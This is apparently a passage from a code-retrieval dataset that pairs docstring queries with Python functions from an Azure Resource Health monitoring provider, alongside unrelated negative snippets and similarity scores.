"def setup_parser(self) -> Dict[str, Any]:\n\n\n # % GALAT - SPP Single Point Positioning\n # % -------------------------------------\n # % Processing Option\n # % ------------------\n # % GNSS system(s) : GALILEO\n # % Orbit type : Broadcast - INAV\n # % Solution type : SPP\n # % Frequency : E1\n # % Elevation mask : 5.0 deg\n # % Time interval : 30.0 s\n # % Ionosphere opt : NeQuick-G\n # % Troposhere opt : GMF with GPT\n # % Obs start : 2020/01/04 00:00:00.0 GPST (week 2086 518400.0s)\n # % Obs end : 2020/01/04 23:59:30.0 GPST (week 2086 604770.0s)\n # % Epoch expected : 2880\n # % Epoch have : 2880\n # %\n # % Input file(s) : KOUG00GUF_R_20200040000_01D_30S_MO.rnx\n # % Input file(s) : CNES0030.20L\n # % Input file(s) : CNES0040.20L\n # % Input file(s) : igs14.atx\n # %\n # % RINEX header info\n # % ------------------\n # % Marker : KOUG 97301M402\n # % Receiver T/V/# : SEPT POLARX5TR 5.3.0 17323022503\n # % Antenna T/ /# : LEIAR25.R3 LEIT 10180007\n # % Position XYZ : 3855263.3407 -5049731.9986 563040.4252\n # % Antenna H/E/N : 0.0000 0.0000 0.0000\n self._parse_header()\n\n # ----+----1----+----2----+----3----+----4----+----5----+----6----+----7----+----8----+----9----+----0----+--\n # 2020/01/04 00:00:00 5.098466365 -52.639742999 106.8901 -0.603 -0.821 -0.349 1.018 0.349 \n # 2020/01/04 00:00:30 5.098466094 -52.639742684 107.4962 -0.633 -0.856 0.257 1.065 0.257 \n # 2020/01/04 00:01:00 5.098466030 -52.639740961 107.6125 -0.640 -1.047 0.373 1.228 0.373 \n return dict(\n names=(\n \"yyyymmdd\", \n \"hhmmss\", \n \"latitude\", \n \"longitude\", \n \"height\", \n \"dlatitude\", \n \"dlongitude\", \n \"dheight\",\n \"hpe\",\n \"vpe\",\n \"site_vel_3d\",\n \"pdop\",\n \"num_satellite_available\",\n \"num_satellite_used\",\n ),\n comments=\"%\",\n delimiter=(10, 9, 15, 15, 10, 9, 9, 9, 9, 9, 9, 6, 4, 4),\n dtype=(\"U10\", \"U9\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\", \"f8\"),\n autostrip=True,\n )",
"def __init__(self, conf={}, rcfile=None, loglevel=_loglevel_):\n defaultrc = \"\"\"\\\n[nuxeo_account]\nuser = Administrator\npassword = Administrator\n\n[rest_api]\nbase = http://localhost:8080/nuxeo/site/api/v1\nX-NXDocumentProperties = dublincore\n\"\"\"\n config = configparser.ConfigParser()\n # first level of defaults hardcoded above\n config.read_string(defaultrc)\n # then, check for an rcfile supplied by the caller\n if rcfile:\n config.read_file(rcfile)\n # otherwise, check a default path in user directory\n elif not(rcfile) and os.path.isfile(expanduser('~/.pynuxrc')):\n config.read(expanduser('~/.pynuxrc'))\n\n token_auth = bool(\n config.has_option('nuxeo_account', 'method') and\n config.get('nuxeo_account', 'method') == 'token')\n\n token = None\n if config.has_option('nuxeo_account', 'X-Authentication-Token'):\n token = config.get('nuxeo_account', 'X-Authentication-Token')\n\n # these are the defaults from the config\n defaults = {\n \"auth_method\":\n 'token' if token_auth else 'basic',\n \"user\":\n config.get('nuxeo_account', 'user'),\n \"password\":\n config.get('nuxeo_account', 'password'),\n \"api\":\n config.get('rest_api', 'base'),\n \"X-NXDocumentProperties\":\n config.get('rest_api', 'X-NXDocumentProperties'),\n \"X-Authentication-Token\":\n token,\n }\n self.conf = {}\n self.conf.update(defaults)\n # override the defaults based on conf pased in by caller\n self.conf.update(conf)\n\n if config.has_section('ezid'):\n self.ezid_conf = {\n \"host\":\n config.get('ezid', 'host'),\n \"username\":\n config.get('ezid', 'username'),\n \"password\":\n config.get('ezid', 'password'),\n \"shoulder\":\n config.get('ezid', 'shoulder'),\n }\n\n # auth and headers for the request object\n self.document_property_headers = {\n 'X-NXDocumentProperties': self.conf['X-NXDocumentProperties']\n }\n if self.conf['auth_method'] == 'token':\n self.document_property_headers.update({\n 'X-Authentication-Token':\n self.conf['X-Authentication-Token']\n })\n self.auth = None\n else:\n self.auth = (self.conf[\"user\"], self.conf[\"password\"])\n\n # set debugging level\n numeric_level = getattr(logging, loglevel, None)\n if not isinstance(numeric_level, int):\n raise ValueError('Invalid log level: %s' % loglevel)\n logging.basicConfig(\n level=numeric_level, )\n # log some stuff\n self.logger = logging.getLogger(__name__)\n self.logger.info(\"init Nuxeo object\")\n redacted = self.conf\n redacted.update({'password': '...redacted...'})\n self.logger.debug(redacted)\n\n # implement retry strategy\n # https://findwork.dev/blog/advanced-usage-python-requests-timeouts-retries-hooks/#retry-on-failure\n retry_strategy = Retry(\n total=3,\n status_forcelist=[413, 429, 500, 502, 503, 504],\n)\n adapter = HTTPAdapter(max_retries=retry_strategy)\n self.http = requests.Session()\n self.http.mount(\"https://\", adapter)\n self.http.mount(\"http://\", adapter)",
"def _load_from_conf(self, parser, section, db, conf_dir, cloud_confs, conf_file):\n\n iaas = config_get_or_none(parser, section, \"iaas\", self.iaas)\n iaas_url = config_get_or_none(parser, section, \"iaas_url\", self.iaas_url)\n\n sshkey = config_get_or_none(parser, section, \"sshkeyname\", self.keyname)\n localssh = config_get_or_none(parser, section, \"localsshkeypath\", self.localkey)\n ssh_user = config_get_or_none(parser, section, \"ssh_username\", self.username)\n scp_user = config_get_or_none(parser, section, \"scp_username\", self.scp_username)\n bootconf = config_get_or_none(parser, section, \"bootconf\", self.bootconf)\n bootpgm = config_get_or_none(parser, section, \"bootpgm\", self.bootpgm)\n bootpgm_args = config_get_or_none(parser, section, \"bootpgm_args\", self.bootpgm_args)\n hostname = config_get_or_none(parser, section, \"hostname\", self.hostname)\n readypgm = config_get_or_none(parser, section, \"readypgm\", self.readypgm)\n readypgm_args = config_get_or_none(parser, section, \"readypgm_args\", self.readypgm_args)\n iaas_key = config_get_or_none(parser, section, \"iaas_key\", self.iaas_key)\n iaas_secret = config_get_or_none(parser, section, \"iaas_secret\", self.iaas_secret)\n securitygroups = config_get_or_none(parser, section, \"securitygroups\", self.securitygroups)\n\n terminatepgm = config_get_or_none(parser, section, \"terminatepgm\", self.terminatepgm)\n terminatepgm_args = config_get_or_none(parser, section, \"terminatepgm_args\", self.terminatepgm_args)\n\n pgm_timeout = config_get_or_none(parser, section, \"pgm_timeout\", self.pgm_timeout)\n\n local_exe = config_get_or_none_bool(parser, section, \"local_exe\", self.local_exe)\n\n\n allo = config_get_or_none(parser, section, \"allocation\", self.allocation)\n image = config_get_or_none(parser, section, \"image\", self.image)\n cloudconf = config_get_or_none(parser, section, \"cloud\")\n if cloudconf:\n try:\n conf = cloud_confs[cloudconf]\n except:\n raise APIUsageException(\"%s is not a valud cloud description in this plan\" % (cloudconf))\n\n if not iaas:\n iaas = conf.iaas\n if not iaas_url:\n iaas_url = conf.iaas_url\n if not sshkey:\n sshkey = conf.sshkey\n if not localssh:\n localssh = conf.localssh\n if not ssh_user:\n ssh_user = conf.ssh_user\n if not scp_user:\n scp_user = conf.scp_user\n if not iaas_key:\n iaas_key = conf.iaas_key\n if not iaas_secret:\n iaas_secret = conf.iaas_secret\n if not securitygroups:\n securitygroups = conf.securitygroups\n\n if not iaas:\n iaas = db.default_iaas\n if not iaas_url:\n iaas_url = db.default_iaas_url\n if not allo:\n allo = db.default_allo\n if not sshkey:\n sshkey = db.default_sshkey\n if not localssh:\n localssh = db.default_localssh\n if not ssh_user:\n ssh_user = db.default_ssh_user\n if not scp_user:\n scp_user = db.default_scp_user\n if not iaas_key:\n iaas_key = db.default_iaas_key\n if not iaas_secret:\n iaas_secret = db.default_iaas_secret\n if not securitygroups:\n securitygroups = db.default_securitygroups\n if not image:\n image = db.default_image\n if not bootconf:\n bootconf = db.default_bootconf\n if not bootpgm:\n bootpgm = db.default_bootpgm\n if not bootpgm_args:\n bootpgm_args = db.default_bootpgm_args\n if not readypgm:\n readypgm = db.default_readypgm\n if not readypgm_args:\n readypgm_args = db.default_readypgm_args\n if not terminatepgm:\n terminatepgm = db.default_terminatepgm\n if not terminatepgm_args:\n terminatepgm_args = db.default_terminatepgm_args\n if not pgm_timeout:\n pgm_timeout = db.default_pgm_timeout\n\n if not 
local_exe:\n local_exe = db.default_local_exe\n\n\n self.image = image\n self.bootconf = _resolve_file_or_none(conf_dir, bootconf, conf_file)\n self.bootpgm = _resolve_file_or_none(conf_dir, bootpgm, conf_file, has_args=True)\n self.bootpgm_args = bootpgm_args\n self.terminatepgm = _resolve_file_or_none(conf_dir, terminatepgm, conf_file, has_args=True)\n self.terminatepgm_args = terminatepgm_args\n self.pgm_timeout = pgm_timeout\n self.local_exe = local_exe\n\n self.hostname = hostname\n self.readypgm = _resolve_file_or_none(conf_dir, readypgm, conf_file, has_args=True)\n self.readypgm_args = readypgm_args\n self.username = ssh_user\n self.scp_username = scp_user\n self.localkey = _resolve_file_or_none(conf_dir, localssh, conf_file)\n self.keyname = sshkey\n self.allocation = allo\n self.iaas = iaas\n self.iaas_url = iaas_url\n\n self.iaas_secret = iaas_secret\n self.iaas_key = iaas_key\n self.securitygroups = securitygroups\n\n x = config_get_or_none(parser, section, \"iaas_launch\")\n if x:\n if x.lower() == 'true':\n self.iaas_launch = True\n else:\n self.iaas_launch = False\n else:\n if self.hostname:\n self.iaas_launch = False\n else:\n self.iaas_launch = True\n\n # allow the plan to over ride the default image if they want to use a hostname\n if self.iaas_launch is False:\n self.image = None\n\n item_list = parser.items(section)\n deps_list = []\n for (ka,val) in item_list:\n ndx = ka.find(\"deps\")\n if ndx == 0:\n deps_list.append(ka)\n deps_list.sort()\n for i in deps_list:\n deps = config_get_or_none(parser, section, i)\n deps_file = _resolve_file_or_none(conf_dir, deps, conf_file)\n if deps_file:\n parser2 = ConfigParser.ConfigParser()\n parser2.read(deps_file)\n keys_val = parser2.items(\"deps\")\n for (ka,val) in keys_val:\n val2 = config_get_or_none(parser2, \"deps\", ka)\n if val2 is not None:\n bao = BagAttrsObject(ka, val2)\n self.attrs.append(bao)"
] |
[
"0.5799087",
"0.54309773",
"0.5396221",
"0.5391791",
"0.52264905",
"0.51209015",
"0.51099086",
"0.50692695",
"0.5065538",
"0.5049415",
"0.5032216",
"0.50267226",
"0.5001072",
"0.4963002",
"0.49445188",
"0.49378237",
"0.49344987",
"0.49096617",
"0.48961362",
"0.48803616",
"0.48683947",
"0.48217174",
"0.48191994",
"0.48125064",
"0.47984332",
"0.4798107",
"0.47896063",
"0.47671095",
"0.4766236",
"0.47589552"
] |
0.63379407
|
0
|
Implementation of the abstract method. Validates that the collector VM has the permissions required to trigger the RH API.
|
def validate(self) -> bool:
# Call RH for the collector VM. If the call is successful, the collector VM has been assigned the right roles.
collectorVM = AzureInstanceMetadataService.getComputeInstance(
self.tracer, self.name)
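        # Build the collector VM's ARM resource ID from the IMDS compute metadata returned above.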
collectorVMArmId = ARM_ID_TEMPLATE % (
collectorVM[SUBSCRIPTION_ID], collectorVM[RESOURCE_GROUP_NAME], collectorVM[NAME])
rhClient = ResourceHealth(self.tracer)
try:
rhEvents = rhClient.getHistoricalResourceAvailabilityEvents(
self.ctx.authToken, collectorVMArmId)
except Exception as e:
self.tracer.error(
"[%s] RH call validation failed(%s).", self.fullName, e, exc_info=True)
return False
return True
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"async def permission_valid_check(cls):\n pass",
"def check_vulnerability(self):\n\t\tpass",
"def __require_permission_view(self):\n permission = codechecker_api_shared.ttypes.Permission.PERMISSION_VIEW\n if not self.__has_permission(permission):\n raise codechecker_api_shared.ttypes.RequestFailed(\n codechecker_api_shared.ttypes.ErrorCode.UNAUTHORIZED,\n \"You are not authorized to execute this action.\")",
"def validate(self):\n if not self.os_repos:\n raise ValueError(\"No OS repository available for OS {}\".format(\n self.operating_system.name))\n if not self.template:\n raise ValueError(\"No autoinstallation template specified\")\n if not self.installer_template:\n raise ValueError(\"No installer command line template specified\")\n if not self.system_profile._gateway:\n raise ValueError(\"No gateway interface present\")\n\n self.system_profile.hypervisor.validate()\n\n for iface in self.system_profile.ifaces:\n iface.validate()\n\n # verify gateway interface has IP address and gateways\n if not self.system_profile.list_gateway_networks():\n raise ValueError(\n \"Gateway interface {} has no IP address\"\n \" or gateway route\".format(\n self.system_profile._gateway.os_device_name\n ))\n\n # verify that total partition size is not bigger than disk size\n failing_volume_ids = []\n for volume in [volume for volume in self.system_profile.volumes\n if isinstance(volume, (self.DasdVolume,\n self.ZfcpVolume))]:\n total_part_size = sum(\n [partition.size for partition in volume.partitions])\n if total_part_size > volume.size:\n failing_volume_ids.append(str(volume))\n\n if failing_volume_ids:\n raise ValueError(\n \"Partitioning exceeds volume size for volumes {}\".format(\n failing_volume_ids))",
"def _is_accessible_to_all(self, pvm: PermissionView) -> bool:\n\n return pvm.permission.name in self.ACCESSIBLE_PERMS",
"def AssertBasePermission(self, mr):\n servlet_helpers.AssertBasePermission(mr)",
"def _enforce_authorization(self, **kwargs):\n # Get the env\n env_dict = kwargs.get('env')\n\n # Although it may already be set in the env, just override in case it was only set via command line or config\n # Convert to string since execve() (called by Popen in base classes) wants string values.\n env_dict['EG_IMPERSONATION_ENABLED'] = str(self.impersonation_enabled) # TODO - Leave EG_ for kernelspec?\n\n # Now perform authorization checks\n if self.kernel_username in self.unauthorized_users:\n self._raise_authorization_error(\"not authorized\")\n\n # If authorized users are non-empty, ensure user is in that set.\n if self.authorized_users.__len__() > 0:\n if self.kernel_username not in self.authorized_users:\n self._raise_authorization_error(\"not in the set of users authorized\")",
"def _check_permissions(source: Any, info: Info, kwargs: Dict[str, Any]):\n for permission_class in self.permission_classes:\n permission = permission_class()\n\n if not permission.has_permission(source, info, **kwargs):\n message = getattr(permission, \"message\", None)\n raise PermissionError(message)",
"def DeniedPermissions(self) -> _n_6_t_0:",
"def validate(self):\n AcceleratorType.validate(self.accelerator_type)\n gcp.validate_machine_configuration(self.cpu_cores,\n self.memory,\n self.accelerator_type,\n self.accelerator_count)",
"def validate_approver(self, request):\n\n if not handler.dataHelper.check_admin_approver(request.session['id']):\n handler.logHelper.log_it_visit(request, __name__ + '.validate_approver', authorized=False)\n raise PermissionDenied('You cannot access this page!')",
"def RequestedPermissions(self) -> _n_6_t_0:",
"def _validate(self):\n pass",
"def on_model_change(self, form, model, is_created):\n if not current_user.is_active or not current_user.is_authenticated:\n abort(403)\n elif is_created:\n if not user_has_permission(current_user, 'can_create', 'advisorapplicants'):\n abort(403)\n else:\n if not user_has_permission(current_user, 'can_edit', 'advisorapplicants'):\n abort(403)",
"def __validate():\n # TODO: implement",
"def _is_granter_pvm( # pylint: disable=no-self-use\n self, pvm: PermissionView\n ) -> bool:\n\n return pvm.permission.name in {\"can_override_role_permissions\", \"can_approve\"}",
"def _check_groups_kvm():\n if not _user_belongs_to('libvirtd') and not _user_belongs_to('kvm'):\n _raise_group_error('kvm')",
"def __validate(self):\n pass",
"def on_model_change(self, form, model, is_created):\n if not current_user.is_active or not current_user.is_authenticated:\n abort(403)\n elif is_created:\n if not user_has_permission(current_user, 'can_create', 'advisors'):\n abort(403)\n else:\n if not user_has_permission(current_user, 'can_edit', 'advisors'):\n abort(403)",
"def validate(self, data):\n\t\tvalidated_data = super(BoxSerializer, self).validate(data)\n\t\tuser = self.context['request'].user\n\t\tcheck_constraint_util = CheckConstraintsUtil(user, validated_data, self.instance) \n\t\treturn check_constraint_util.check_constraints()",
"def __init__(self):\n\n self._authorize()",
"def initial(self, request, *args, **kwargs):\n\n # It's checks the permissions for the third party endpoint or not. It give access if key present.\n bool_value, message = self.check_api_keys(request)\n if bool_value:\n super(ProjectRestrictedGenericViewSet, self).initial(request, *args, **kwargs)\n # Check action permissions\n self.check_action_permissions(request)\n else:\n self.app_permission_denied(request, message)",
"def _check_validity(self):\n pass",
"def test_call_bad_perms(self):\r\n self.assertRaises(ValueError, self.cs_overview, -1)",
"def check_permission():\n if IS_ADMIN:\n out_info(\"Running as Root/Admin\")\n else:\n out_warning(\"Running without root/admin privileges\")",
"def on_model_change(self, form, model, is_created):\n if not current_user.is_active or not current_user.is_authenticated:\n abort(403)\n elif is_created:\n if not user_has_permission(current_user, 'can_create','admins'):\n abort(403)\n else:\n if not user_has_permission(current_user, 'can_edit','admins'):\n abort(403)",
"def _is_admin_pvm(self, pvm: PermissionView) -> bool:\n\n return not self._is_user_defined_permission(pvm)",
"def validate(self):\n if not self.keys:\n raise ValueError(\"Virtual host missing keys\")\n for i in self.keys:\n i.validate()",
"def on_model_change(self, form, model, is_created):\n if not current_user.is_active or not current_user.is_authenticated:\n abort(403)\n elif is_created:\n if not user_has_permission(current_user, 'can_create','roles'):\n abort(403)\n else:\n if not user_has_permission(current_user, 'can_edit','roles'):\n abort(403)",
"def validate(self):\n raise NotImplementedError"
] |
[
"0.6178343",
"0.59988725",
"0.5770928",
"0.57393557",
"0.56788474",
"0.56340134",
"0.5534252",
"0.55060536",
"0.55051845",
"0.5490519",
"0.54623586",
"0.54542404",
"0.5446576",
"0.5435001",
"0.54199827",
"0.5419372",
"0.54152685",
"0.54123425",
"0.541165",
"0.54085827",
"0.53807825",
"0.53722566",
"0.5371619",
"0.5360214",
"0.53454715",
"0.533925",
"0.5333318",
"0.5331246",
"0.53227735",
"0.53150177"
] |
0.74354815
|
0
|
Abstract method implementation to generate the JSON string for the results to push to LA.
|
def generateJsonString(self) -> str:
try:
if self.lastResult is not None and len(self.lastResult) != 0:
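                # Stamp each result entry with the payload version, provider instance name, and provider metadata before serialization.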
for result in self.lastResult:
result['SAPMON_VERSION'] = PAYLOAD_VERSION
result['PROVIDER_INSTANCE'] = self.providerInstance.name
result['METADATA'] = self.providerInstance.metadata
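            # Serialize the (possibly empty) result list with the custom JsonEncoder.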
resultJsonString = json.dumps(
self.lastResult, sort_keys=True, indent=4, cls=JsonEncoder)
self.tracer.debug("[%s] resultJson=%s" % (self.fullName,
str(resultJsonString)))
except Exception as e:
self.tracer.error("[%s] Could not format lastResult=%s into JSON (%s)", self.fullName,
self.lastResult,
e, exc_info=True)
raise
return resultJsonString
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def format_json(self,query_results):\n results=query_results.data\n factory=factory_json()\n dump=factory.dumps(results)\n print(dump)\n # TODO return output for this\n return \"\"",
"def get_json_string(self, **kwargs):\n ...",
"def json(self):\n robot_dict = self.robot_dict()\n target_dict = self.target_dict()\n json_str = '{'\n json_str = json_str + '\"robot_obj\" : ' + json.dumps(robot_dict) + \",\\n\"\n json_str = json_str + '\"target_obj\" : ' + json.dumps(target_dict) + \"\\n\"\n json_str = json_str + '}'\n return(json_str)",
"def as_json(self):",
"def json_all_builder(self, customer_count, invoice_count, invl_count ):\n json_result = '{\\n'\n json_result += '\\t \"_results\":[\\n'\n json_result += '\\t\\t{ \"customer_count\": \"' + str(customer_count)\n json_result += ', \"invoice_count\": \"' + str(invoice_count)\n json_result += ', \"invl_count\": \"' + str(invl_count)\n json_result += '}\\n'\n json_result += '\\n\\t]\\n}'\n return json_result",
"def json_friendly(self):",
"def to_json(self):\n pass",
"def getJSON(self):\n text = super().getJSON() + f', \"exchange\": \"{self.__exchange}\"'\n text += f', \"market pair\": \"{self.__market_pairs}\"'\n text += f', \"interval\": \"{self.__interval}\"}}'\n return text",
"def get_json_accessibility_result(self):\n axe_result = json.dumps(self.results, indent = 3)\n logger.info(axe_result)\n return axe_result",
"def json_view(self, recursive=False):\n\n context = self.context.aq_inner\n data = self.export(context, recursive=recursive)\n pretty = json.dumps(data, sort_keys=True, indent=4)\n self.request.response.setHeader(\"Content-type\", \"application/json\")\n return pretty",
"def display_json(self, results, verbose):\n print(json.dumps(results))",
"def __str__(self):\n\t\treturn json.dumps(self.json)",
"def json(self):\n class ExtendedJSONEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, datetime.date) or isinstance(obj, datetime.time):\n encoded_object = obj.isoformat()\n else:\n encoded_object = json.JSONEncoder.default(self, obj)\n return encoded_object\n\n obj = {\n 'operation': self.operation,\n 'version': self.version,\n 'language': self.language,\n 'identifiers': self.identifiers,\n 'store_execute': self.store_execute,\n 'status': self.status,\n 'lineage': self.lineage,\n 'inputs': dict((i, [inpt.json for inpt in self.inputs[i]]) for i in self.inputs),\n 'outputs': self.outputs,\n 'raw': self.raw\n }\n\n return json.dumps(obj, allow_nan=False, cls=ExtendedJSONEncoder)",
"def to_json_string(self) -> None:\n return json.dumps(dataclasses.asdict(self)) + \"\\n\"",
"def _json(self, data):\n if len(data) == 0:\n return \"\"\n if self.meta:\n data['meta_history'] = [{'prog': __prog__,\n 'release': __release__,\n 'author': __author__,\n 'date': __now__},]\n return json.dumps(data) + \"\\n\"",
"def to_json_string(self):\n\t\treturn json.dumps(dataclasses.asdict(self), indent=2, sort_keys=True) + \"\\n\"",
"def get_json(self):\n json_item = {\"id: \": self.id,\n \"question: \": self.question,\n \"documents: \": self.documents,\n \"document_ids: \": self.document_ids,\n \"gold answers: \": self.gold}\n return json_item",
"def report_json(self):\n # type: () -> Optional[AnyStr]\n return json.dumps(self.gen_report(as_dict=True), indent=4)",
"def to_json(self, exclude_vectors=True):\n json_repr = vars(self)\n json_repr[\"results\"] = [\n r.to_json(exclude_vectors=exclude_vectors) for r in json_repr[\"results\"]]\n return json_repr",
"def __str__(self) -> str:\n obj_dict: Dict[str, Any] = {}\n obj_dict[\"doc\"] = self.doc\n obj_dict[\"type\"] = self.type\n obj_dict[\"name\"] = self.name\n\n line_range = self.line_range()\n obj_dict[\"start_line\"] = line_range[0]\n obj_dict[\"end_line\"] = line_range[1]\n\n obj_dict[\"children\"] = []\n\n for child in self.children.values():\n obj_dict[\"children\"].append(json.loads(str(child)))\n\n return json.dumps(obj_dict)",
"def json(self):\r\n return {\"id\": self.id, \"code\": self.code, \"description\": self.description, \"xCoor\": self.x_coor, \"yCoor\": self.y_coor, \"latitude\": self.latitude,\r\n \"longitude\": self.longitude, \"waterschapId\": self.waterschap_id, \"watertypeId\": self.watertype_id, \"watertypeKrwId\": self.watertype_krw_id}",
"def GetJSON(self):\n return json.dumps(self.GetDict())",
"def encode(self):\n return json.dumps(self.get_data(), indent=4)",
"def generate(self, sorted=False):\n json_result = json.dumps(self.generate_dict(), sort_keys=sorted)\n return json_result",
"def to_json(self) -> JSON:\n pass",
"def to_json(self, names):\n raise Exception('Cannot run abstract method.')",
"def to_json(self, names):\n raise Exception('Cannot run abstract method.')",
"def to_json(self):\n return json.dumps(\n {\n \"long_url\": self.long_url,\n \"special_code\": str(self.special_code),\n \"stub\": self.stub,\n }\n )",
"def to_json_string(self):\n\t\treturn json.dumps(self.to_dict(), indent=2, sort_keys=True) + \"\\n\"",
"def __repr__(self):\n result = json.dumps({'processed': self._processed,\n 'failed': self._failed,\n 'total': self._total,\n 'time': str(self._time),\n 'chunk': self._chunk})\n return result"
] |
[
"0.7380562",
"0.6979047",
"0.6829505",
"0.6711398",
"0.6708633",
"0.6640155",
"0.64915836",
"0.64715326",
"0.6465525",
"0.6458256",
"0.642514",
"0.6387305",
"0.6366938",
"0.6351204",
"0.6293009",
"0.6289616",
"0.6279474",
"0.6252944",
"0.62293446",
"0.62089664",
"0.61992306",
"0.61967945",
"0.61960185",
"0.619015",
"0.6184949",
"0.61814266",
"0.61814266",
"0.6181295",
"0.61801666",
"0.6169753"
] |
0.73502034
|
1
|
Compile the Azure resources from global state and get RH events for those resources.
|
def _actionGetRHEvents(self):
self.lastResult = []
self.pollingState = self.state.get(POLLING_STATE, {})
# Get resources for which AIOps is enabled.
resources = self.__compileAIOpsEnabledResources()
self.tracer.info("[%s] There are %s resources compiled for fetching RH events and they are %s" % (
self.fullName, len(resources), resources))
        # Get an iterator for the resources. Using an iterator ensures that we loop over the resources list only once while submitting work to the ThreadPoolExecutor.
resourcesIterator = iter(resources)
        # Initialize a ThreadPoolExecutor to parallelize RH calls. Use a with statement to ensure clean-up of the ThreadPoolExecutor object.
with ThreadPoolExecutor(NUMBER_OF_RH_THREADS) as executor:
# Schedule the first N calls. Not scheduling them all at once, to avoid consuming excessive amounts of memory.
futures = {
executor.submit(self.__getRHEventsAndUpdateResult, resource): resource
for resource in itertools.islice(resourcesIterator, NUMBER_OF_RH_THREADS)
}
while futures:
# Wait for a call to complete.
completedFutures, futures = wait(
futures, timeout=MAX_TIMEOUT, return_when=FIRST_COMPLETED
)
# Schedule the next set of calls based on the number of completed calls. There shouldn't be more than NUMBER_OF_RH_THREADS calls in the pool at a time, to keep memory consumption down.
for resource in itertools.islice(resourcesIterator, len(completedFutures)):
futures.add(
executor.submit(
self.__getRHEventsAndUpdateResult, resource)
)
self.tracer.info("[%s] The number of health events compiled = %s" % (
self.fullName, len(self.lastResult)))
self.updateState()
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def __getRHEventsAndUpdateResult(self, resource: Dict[str, str]) -> None:\n # Validate the state data.\n self.__validateResourceStateEntry(resource)\n\n self.tracer.info(\"[%s] Fetching the RH events for resource = %s\" % (\n self.fullName, resource[AZ_RESOURCE_ID]))\n\n # Extract the polling state for the current resource.\n resourcePollingState = self.pollingState.get(\n resource[AZ_RESOURCE_ID], {})\n\n self.tracer.info(\"[%s] polling state for resource with Id = %s is %s\" % (\n self.fullName, resource[AZ_RESOURCE_ID], resourcePollingState))\n\n rcaPollingState = resourcePollingState.get(RCA, [])\n self.tracer.info(\"[%s] RCA polling state for resource with Id = %s is %s\" % (\n self.fullName, resource[AZ_RESOURCE_ID], rcaPollingState))\n\n # Parse the minimum time. datetime.min can't be used as the year is not formatted with zero padding.\n datetimeMin = datetime.strptime(MIN_DATETIME, OCCURED_TIME_FORMAT[0])\n\n # Fetch the occuredTime of the last record that was pushed to LA for the given resource.\n lastOccuredTime = resourcePollingState.get(\n LAST_OCCURED_TIME, datetimeMin)\n self.tracer.info(\"[%s] lastOccuredTime from polling state for resource with Id = %s is %s\" % (\n self.fullName, resource[AZ_RESOURCE_ID], lastOccuredTime))\n\n # Variable to store updated occuredTime in case new health events are obtained from RH.\n updatedLastOccuredTime = lastOccuredTime\n\n try:\n rhEvents = self.rhClient.getHistoricalResourceAvailabilityEvents(\n self.providerInstance.ctx.authToken, resource[AZ_RESOURCE_ID])\n self.tracer.info(\"[%s] number of RH events received = %s; resourceId=%s; numberOfEventsCompiledForAllResourcesSoFar=%s\" % (\n self.fullName, len(rhEvents), resource[AZ_RESOURCE_ID], len(self.lastResult)))\n numberOfNewEvents = 0\n rhEventIds = []\n for event in rhEvents:\n hasRca = False\n rhEventIds.append(event[ID])\n currentOccuredTime = self.__parseOccuredTime(\n event[PROPERTIES][OCCURED_TIME])\n\n # Update the lastOccuredTime which can be stored in the state file for the current resource.\n if currentOccuredTime > updatedLastOccuredTime:\n updatedLastOccuredTime = currentOccuredTime\n\n # Check if the event has been previously processed using the occuredTime.\n # This will occur because the health events are obtained for the last one day and the polling frequency is 15 minutes.\n # In case the event has RCA, the event will have the same occuredTime as the transition event for the same issue. Additional checks are required.\n if currentOccuredTime <= lastOccuredTime:\n if self.__isNotRcaEvent(event):\n # Skip this event. This has already been processed.\n continue\n else:\n # This is an RCA event.\n eventTitle = event[PROPERTIES][TITLE] if TITLE in event[PROPERTIES] else None\n self.tracer.info(\"[%s] RCA event older than lastOccuredTime received for resourceId=%s; RH event id=%s; title=%s\" % (\n self.fullName, resource[AZ_RESOURCE_ID], event[ID], eventTitle))\n hasRca = True\n if event[ID] in rcaPollingState:\n # Skip this event. The RCA event has been processed before.\n continue\n\n # New RCA event has been received. Add it to the state variable.\n rcaPollingState.append(event[ID])\n\n numberOfNewEvents += 1\n # Sanitize the data and add additional data related to the resource. 
HTML tags are converted to markdown format and action tags are removed.\n sanitizedEvent = self.__sanitizeEvent(event, resource, hasRca)\n\n self.lastResult.extend([sanitizedEvent])\n\n self.tracer.info(\"[%s] resourceId=%s; number of RH events received = %s; numberOfNewEvents=%s; updatedLastOccuredTime=%s\" % (\n self.fullName, resource[AZ_RESOURCE_ID], len(rhEvents), numberOfNewEvents, updatedLastOccuredTime))\n\n # Clean up rcaPollingState to remove the stale entries.\n rcaEventCountBeforeCleanUp = len(rcaPollingState)\n rcaPollingState = self.__cleanRcaPollingState(\n rhEventIds, rcaPollingState)\n self.tracer.info(\"[%s] resourceId=%s; rcaEventCountBeforeCleanUp = %s; rcaEventCountAfterCleanUp=%s\" % (\n self.fullName, resource[AZ_RESOURCE_ID], rcaEventCountBeforeCleanUp, len(rhEvents)))\n\n # Update the values for the current resource in the shared state dictionary.\n self.pollingState[resource[AZ_RESOURCE_ID]] = {\n LAST_OCCURED_TIME: updatedLastOccuredTime, LAST_RUN_TIMESTAMP: datetime.now(), RCA: rcaPollingState}\n\n except Exception as e:\n self.tracer.error(\n \"[%s] Failed to get RH events and update the result for the resource with azResourceId=%s. numberOfEventsCompiledForAllResourcesSoFar=%s (%s)\", self.fullName, resource[AZ_RESOURCE_ID], len(self.lastResult), e, exc_info=True)",
"def gen_resources(self):\n\n print \"\\t* Adding resources to compute template\"\n\n # add all the nets and subnets\n self.gen_net_resources()\n\n # add all routers\n self.gen_router_resources()\n\n # add all servers/intances\n self.gen_server_resources()",
"def set_resources():\n global available_resources\n global EdgenodeResources\n recv_json = request.get_json()\n for resourcename, value in recv_json.items():\n available_resources[resourcename] = value\n # TODO make this better\n EdgenodeResources = [TaskResources(ram=int(available_resources['RAM']), cpu=int(\n available_resources['CPU']), hdd=int(available_resources['HDD'])), available_resources['DATA']]\n\n print 'Available resources set to', EdgenodeResources\n return 'Available resources set to ' + str(available_resources)",
